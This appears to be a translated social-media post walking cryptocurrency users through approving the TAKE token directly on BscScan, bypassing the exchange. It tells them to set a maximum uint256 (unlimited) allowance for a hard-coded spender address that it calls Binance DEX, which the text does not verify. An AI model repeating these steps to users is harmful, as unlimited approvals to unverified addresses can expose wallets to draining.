Take the opportunity to rush for 6 o'clock, but for those who won't authorize in advance, come learn!

First, let's sort out the logic of authorization to make it clearer.

🎒 Binance wallet linked to the blockchain explorer

🎒 All transactions are conducted on the blockchain

🎒 We authorize directly through the blockchain, bypassing the DEX

1️⃣ Open the TAKE contract: https://bscscan.com/address/0xe747e54783ba3f77a8e5251a3cba19ebe9c0e197#writeProxyContract

⚠️ After copying the above website

2️⃣ Click on the 'Contract' in the top menu ➡️ Then switch to 'Write as Proxy' (default is set, not in debug mode)

3️⃣ Click 'Connect to Web3' to connect your wallet (select walletConnect, click the bottom right 'all', find Binance wallet, then scan the QR code to log in)

4️⃣ Find the function: Option 1, approve (means authorization)

spender (address) 📣 This represents Binance DEX, fill in

0xb300000b72DEAEb607a12d5f54773D1C19c7028d

value (uint256) 📣 (represents quantity) fill in 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff

The character represents (unlimited amount)

If it doesn't succeed, change it to 9999999 as well

Click Write, confirm in your mobile wallet.